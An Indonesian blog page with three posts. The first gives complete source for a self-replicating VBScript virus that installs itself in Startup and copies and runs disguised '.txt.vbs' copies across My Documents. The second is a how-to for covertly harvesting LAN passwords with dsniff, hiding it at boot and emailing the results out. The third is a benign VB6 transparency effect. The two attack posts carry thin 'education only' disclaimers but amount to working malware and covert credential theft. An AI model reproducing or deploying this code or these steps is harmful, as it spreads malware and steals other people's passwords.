VBS Virus bagian 1

Diposting oleh fitri-ariyanto on Saturday, March 22, 2008

Akhirnya sampe juga post yang satu ini..:D..
kesibukan akhir2 ini yang membuat saya kehabisan waktu untuk membuat post selanjutnya..(maklum pengacara [pengangguran banyak acara..hheheheh :)] yang sok sibuk..:P)..OK tanpa basa basi lagi kita mulai tutorial yang pertama..

TULISAN INI HANYA UNTUK PENDIDIKAN BELAKA YANG MANA TIDAK ADA UNSUR2 YANG KEJAHATAN YANG PENULIS MAKSUDKAN. UNTUK SELANJUTNYA TESERAH ANDA YANG MENENTUKAN..INGAT! KEBIJAKSANAAN ANDALAH CERMIN DARI KESEHATAN JIWA DAN PIKIRAN ANDA..:D


algoritma:
./ Memeriksa eksistensi dirinya pada starup
jika hasil null maka
copikan diri pada startup

./ Memeriksa setiap folder pada my documents eksistensi diri
copikan diri kesetiap folder my documents hingga subfolder terakhir

./ Proses berakhir

dalam algo diatas adalah jalan mudah bagi kita untuk menuliskan urutan2 yang akan kita gunakan acuan nantinya..bisa anda tulis di notepad.

Buka notepad lagi..kemudian ketikkan code berikut:
kalau anda males..(biasa saya juga sering males :P) tinggal copy paste bereskan..??

'====ketik dari REM disini====

Rem === Clara.A / VBS ===
Rem Ini adalah program virus vbs bagian pertama
Rem Dan Hanya untuk tujuan pendidikan bahwa membuat virus itu tdk se-sulit yg dbygkan
Rem Kebijaksanaan anda yang menentukan nasib dari virus ini
Rem =====================

'//* Berikut adalah tugas untuk mengkopikan ke spesial folder startup *//
'//* Berfungsi virus dpt berjalan pd saat windows booting *//

'//* Jika error lanjutkan perintah selanjutnya *//
On error resume next

'//* Deklarasi fungsi object *//
Dim FSO, Induk, WSH, Sasaran, cPath

'//* setting setiap deklarasi object *//
Set FSO = CreateObject("Scripting.FileSystemObject")
set Induk = FSO.GetFile(Wscript.ScriptFullName)
Set WSH = CreateObject("Wscript.Shell")

'//* Mendapatkan folder startup *//
Launch = WSH.SpecialFolders("Startup")

'//* Copy induk dengan nama boot.vbs *//
Induk.Copy (Launch & "\boot.vbs")

'//* Copy Induk di folder my document *//
Launch = WSH.SpecialFolders("MyDocuments")

'//* Infeksi folder my document *//
InfeksiFolder Launch

'//* Membuat Sub untuk menginfeksi Folder my document *//
Sub InfeksiFolder(cPath)
on error resume next

For Each Sasaran in FSO.GetFolder(cPath).SubFolders
Induk.Copy(Sasaran & "\Surat Cinta buat Clara.txt.vbs")
WSH.Run(Sasaran & "\Surat Cinta buat.txt.vbs")

Next

End Sub

'=======berakhir disini=======

code diatas memang sangat sedikit, tetapi proses yang lumayan panjang bro..:P.. Memang saat ini sudah banyak antivirus yang sudah mengenali virus vbs dan code ini pun tak luput dari tiupan antivius..artinya dah kedetect ya?..:P..dari code diatas, nanti akan kita buat acuan untuk code2 selanjutnya..dan akan merajuk ke pemrograman visual(Visual Basic)

boleh anda memperbarui code diatas sebatas UNTUK BELAJAR! bukan untuk merusak komputer orang lain..dengan menambahkan sedikit baris code akan tercipta virus yang semakin dahsyat..bagaimana?? Itu tugas anda selanjutnya..

disini kita sama2 belajar, jadi gak mungkinlah penulis sendiri ga ada salah, sok tau atau sok keminter(bahasa jawa) itu wajar saja..jadi anda sang pembaca yang akan meluruskan penulis..OK?

salam dari saya.. Mohon maaf jika salah..

nb:kirimkan kritik, saran, cacian, makian terdahsyat anda...:D
More aboutVBS Virus bagian 1

Hack LAN

Diposting oleh fitri-ariyanto on Tuesday, March 11, 2008

Komunikasi ethernet pada dasarnya adalah komunikasi tipe "siaran" (broadcast). Paket-paket ethernet dari mesin yang satu sebetulnya dilihat oleh setiap komputer yang tergabung dalam suatu jaringan lokal. Paket-paket ini dibuang jika alamat MAC-nya tidak cocok dengan alamat node tujuan.
Nah, dengan menggunakan software-software 'network sniffer', paket-paket ethernet (beserta isinya) yang melewati kartu ethernet tertentu tidak dibuang begitu saja, melainkan dianalisa. Banyak kegunaan sniffing, tapi di artikel ini penulis hanya membahas sniffing password dengan menggunakan program paten karangan Dug Song (www.monkey.org/~dugsong) dsniff.

dsniff aslinya
adalah software Unix, dan teman-teman yang punya Linux/BSD bisa langsung ngedownload dan compile dsniff dari http://www.monkey.org/~dugsong/dsniff). Artikel ini membahas penggunaan di
jaringan lokal berbasis Windows, sebab artikel ini ditujukan untuk pemula, dan mereka-mereka yang pingin memanen password tapi nggak punya akses ke Unix. Program dsniff ini punya spesialisasi menggarap password dari berbagai protokol, dan memformat hasil panenan dalam bentuk yang mudah dibaca.
Protokol yang bisa ditangani oleh dsniff antara lain adalah FTP, Telnet, HTTP, POP, NNTP, IMAP, SNMP, LDAP, Rlogin, NFS, SOCKS, X11, IRC, AIM, CVS, ICQ, Napster, Citrix ICA, Symantec pcAnywhere NAI Sniffer, Microsoft SMB, dan Oracle SQL*Net auth info.

Penggunaan dsniff tidak begitu jauh berbeda antara versi Win32 dengan versi Unix-nya. Kelebihan yang bias dinikmati pengguna Unix saat ini adalah adanya dua program tambahan di dsniff yang membuat dsniff versi Unix lebih perkasa, mampu memanen password dari jaringan berbasis "ethernet switch" atau "active hub", jadi tidak terbatas ke jaringan "hub" saja.

Bahan-bahan/Persyaratan:
--------------------------------
LAN lokal untuk target, yang terhubung dengan menggunakan "ethernet hub" (bukan switch)
- mesin Windows 95, 98 atau ME (untuk 2000 dan XP, kamu mesti punya hak administrator di mesin yg akan digunakan untuk memanen) yang terhubung ke LAN target
- WinPCap library, download dari http://netgroup-serv.polito.it/winpcap/install/bin/WinPcap.exe
- dsniff port to Win32, download dari http://www.datanerds.net/~mike/binaries/dsniff-1.8-win32-static.tgz
(gunakan WinZip untuk nge-extract file-file .exe-nya)

Langkah2nya :
------------------

- Install WinPcap library. Doubleclick winpcap.exe dan ikuti petunjuk di layar (tinggal pencet "Next","Next","Finish")
- Extract file dsniff...tgz nya ke suatu directory (sebaiknya di bawah
C:\Windows atau tempat lain yang nggak terlalu mencurigakan - untuk artikel ini, anggap saja disimpan di C:\WINDOWS\DS)
- Mulai memanen password. Dari start menu, klik "Run", ketik "command". Pindah ke direktori tempat disimpannya dsniff ("cd \windows\ds"). dari prompt C:> tinggal ketik "dsniff".
- silakan menonton password-password milik pengguna ditampilkan di layar

Catatan:
----------
Ada kemungkinan anda harus menspesifikasikan kartu ethernet mana yang ingin disadap. Untuk melihat daftar-daftar interface yang tersedia, ketik "dsniff -D" dari prompt DOS. Anda akan melihat daftar interface yang tersedia. Jika secara default dsniff mencoba menyadap interface yang salah, gunakan "dsniff -i [ketik nama interface disini]".


Pengembangan lebih lanjut
---------------------------------

Untuk menyimpan daftar password yang terpanen ke sebuah file, tambahkan perintah "-w [namafile]" ke program dsniff. Contoh: "c:\WINDOWS\DS>dsniff -i ELNK3 -w password.db"

untuk membaca file yg dibuat dsniff, berikan perintah "-r [namafile]"
contoh: "C:\WINDOWS\DS>dsniff -r password.db"

secara opsional, jika anda ingin file hasil panen ini disimpan dalam bentuk file ASCII:
"C:\WINDOWS\DS>dsniff -r password.db > panen.txt",

panen.txt siap disajikan.

Yang lebih asyik lagi, bisa kita konfigurasikan agar usaha panen kita tetap berjalan walaupun komputer tersebut di-reboot.Caranya gampang. Mula-mula download dulu program "start minimized" (sm.exe) dari http://www.ethernal.org/List-Archives/curves-kiddies-0010/msg00029.html. Simpan program ini di
C:\WINDOWS. Kemudian kita bikin batch file yang bisa dijalankan dari command prompt. Gunakan Notepad atau "edit" untuk membuat file ini, dan sebagai isi:
@echo off
sm /hidden c:\windows\ds\dsniff.exe -w > password.db

(tambahkan perintah opsional seperti "-i ELNK3" jika perlu)

Nah, simpan file ini (sebagai "ds.bat", misalnya), dan pindahkan file ini ke folder "Startup" lewat Start menu supaya tiap kali komputer di-restart, program dsniff kita dijalankan juga, siap untuk memanen. Program "sm" diatas berfungsi menjalankan program secara tersembunyi supaya tidak mencurigakan.
Tentu saja, biar lebih nggak mencurigakan lagi, rubah nama dsniff.exe ke nama lain, dan jangan lupa ngeganti perintah "dsniff" dengan nama yang baru di semua command dan batch file.
Sekarang anda bisa tinggalkan komputer tersebut, dan dikemudian waktu kembali lagi untuk memeriksa sejauh mana hasil sadapan anda bekerja (dengan perintah "dsniff -r password.db > panen.txt" lalu "notepad panen.txt").


Membuat sadapan lebih portabel
-----------------------------
Untuk membuat disket dsniff, file-file yang anda perlukan adalah: dsniff.exe
wpcap.dll (cari di C:\WINDOWS\SYSTEM atau C:\WINDOWS\SYSTEM32 untuk Win2K/XP) wpcap.vxd packet.dll

simpan file-file ini ke disket (ASmile, dan tinggal dibawa disketnya ke LAN target. Penjalanan perintah masih tetap sama seperti diatas, kecuali lokasi prompt nya bukan di :\WINDOWS\DS>, melainkan di A:\>.
Jika anda butuh tantangan tambahan, gunakan perintah "at" dan program pengirim email blat.exe" untuk mengirimkan hasil panenan ke alamat e-mail anonimus anda setiap jam atau bahkan setiap 5 menit. Jangan lupa bagi-bagi hasil Smile.

Tambahan-tambahan
--------------------------
Port dsniff-win32 juga mengandung beberapa utility ekstra, seperti mailsnarf (untuk membaca lalu lintas e-mail di jaringan lokal), urlsnarf (untuk membaca alamat-alamat website yang dikunjungi pengguna LAN sekitar anda), dan webspy (untuk menguntit jejak surfing mesin tertentu).

Silahkan anda coba main-main dengan utiliti-utiliti ini, penulis yakin akan ada gunanya. Harap diingat bahwa teknik diatas hanya mempan untuk LAN yang terhubung melalui "ethernet hub". Jika kebetulan LAN anda menggunakan "ethernet switch", bukan berarti nggak ada harapan. Pengguna versi
Unix-nya dsniff bisa cengar-cengir, sebab paket dsniff versi Unix mengandung dua program tambahan: arpspoof (untuk 'menipu' mesin-mesin lain agar mengirimkan paket ke mesin anda) dan macof (untuk membanjiri "switch" lokal dengan alamat-alamat MAC acak, biasanya berakibat "ethernet switch"
yang ditargetkan menjadi bingung dan mengubah mode menjadi default, bertingkah laku seperti "ethernet hub").

Deteksi, Pencegahan, dan Penanggulangan
--------------------------------------------------
Sebagai admin, anda bisa mendeteksi kartu-kartu ethernet di LAN anda yang menjalankan dsniff (dan progarm-program sejenis dsniff) karena secara prinsip, untuk meng-capture paket-paket, interface ybs harus berada dalam mode "promiscous". Jadwalkan program-program ini untuk berjalan setiap 5 menit, dan konfigurasikan agar komputer pendeteksi mengemail anda jika ada aktifitas-aktifitas mencurigakan.
Utiliti yang bisa anda gunakan termasuk "promisc", "CPM", "ifstatus", atau yang lebih yahud lagi, utilitas buatan grup hacking Portugal The Apostols yang bernama "NePED" (http://metalab.unc.edu/pub/Linux/distributions/trinux/src/neped.c). Untuk platform Windows, tersedia produk-produk komersil seperti LANGuard/LANSniffer atau AntiSniff dari L0pht Heavy Industry (http://www.l0pht.com/antisniff). Diantara produk-produk diatas, sebagian besar hanyalah bisa mendeteksi adanya sniffer jika dijalankan di mesin lokal. Untuk mendeteksi network secara remote, gunakan NePED atau AntiSniff.

Jika anda punya budget, beli switch ethernet yang nggak nge-default ke "hub mode" kalau di-flood alamat-alamat MAC palsu. Kalau anda nggak ngerti, harap ngambil kursus "Pengenalan TCP/IP" atau berhenti jadi admin. Juga harap ingat bahwa banyak perusahaan-perusahaan yang mengklaim menjual hub yang tak bisa disadap, tapi ternyata hanya menjual hub tipe "active huub" yang biasanya tidak bisa menghandel traffic Fast Ethernet (100 Mbps).

Cara paling handal untuk mencegah bocornya informasi sensitif lewat network adalah dengan menggunakan enkripsi. Pakailah SSH, SCP (pengganti FTP) atau SFTP, TLS (untuk memeriksa e-mail), SSL dan HTTPS (untuk transaksi web), tunelling, dll. Usahakan agar jangan sampai ada program yang mengirimkan password tanpa enkripsi melalui jaringan yang anda kelola. Juga selalu periksa keadaan hard disk anda.
Seringkali sniffer-sniffer meninggalkan jejak berupa file hasil panenan yang berukuran besar (apalagi jika LANnya sibuk).

Cara lain mengamankan network anda adalah dengan memindahkan topologi jaringan anda ke sistem token ring, _dan_ menggunakan kartu-kartu ethernet Token-Ring buatan IBM (iklan sabun colexz). Tapi tentunya metode ini tidaklah praktis bagi anda yang ingin tetap menggunakan topologi star atau hybrid.
More aboutHack LAN

Teknik AlphaBlend Visual Basic 6.0

Diposting oleh fitri-ariyanto on Tuesday, March 04, 2008

Teknik AlphaBlend merupakan sebuah animasi ketika proses atau aplikasi mulai load atau berjalan. Dengan berupa muncul sedikit demi sedikit ataupun menghilang sedikit demi sedikit. Teknik ini dapat memperindah program yang anda buat!

Anda boleh memodifikasi sedemikian hingga..terserah anda dan kreatifitas anda

Okey sekarang kita mulai

Project yang dibutuhkan
a/. 1 Form dengan Properties Form Visible = False
b/. 2 Timer dengan Properties Intervalnya masing-masing = 100 and Enabled = False

//* Code Start *//

Option Explicit

Const LWA_BOTH = 3
Const LWA_ALPHA = 2
Const LWA_COLORKEY = 1
Const GWL_EXSTYLE = -20
Const WS_EX_LAYERED = &H80000

Private Declare Function GetWindowLong Lib "user32" Alias "GetWindowLongA" (ByVal hWnd As Long, ByVal nIndex As Long) As Long

Private Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hWnd As Long, ByVal nIndex As Long,ByVal dwNewLong As Long) As Long

Private Declare Function SetLayeredWindowAttributes Lib "user32" (ByVal hWnd As Long, ByVal color As Long, ByVal x As Byte, ByVal alpha As Long) As Boolean

Dim TransparanDonk As Integer

Sub Transparan(hWndBro As Long, TransBro As Integer)
On Error Resume Next

Dim OKBro As Long
OKBro = GetWindowLong(hWndBro, GWL_EXSTYLE)

SetWindowLong hWndBro, GWL_EXSTYLE, OKBro Or WS_EX_LAYERED
SetLayeredWindowAttributes hWndBro, RGB(255, 255, 0), TransBro, LWA_ALPHA
Exit Sub

End Sub

Private Sub Form_Load()
Timer1.Enabled = True
End Sub

Private Sub Form_Unload(Cancel As Integer)
Cancel = 1
Timer1.Enabled = False
Timer2.Enabled = True
End Sub

Private Sub Timer1_Timer()
On Error Resume Next
TransparanDonk = TransparanDonk + 5
If TransparanDonk > 255 Then TransparanDonk = 255: Timer1.Enabled = False
Transparan Me.hWnd, TransparanDonk
Me.Show
End Sub

Private Sub Timer2_Timer()
On Error Resume Next
TransparanDonk = TransparanDonk - 5
If TransparanDonk < 0 Then TransparanDonk = 0: Timer2.Enabled = False: End Transparan Me.hWnd, TransparanDonk
End Sub

//* End Of File *//


NB: Jangan lupa kasih Komentar ya..saran, kritik

More aboutTeknik AlphaBlend Visual Basic 6.0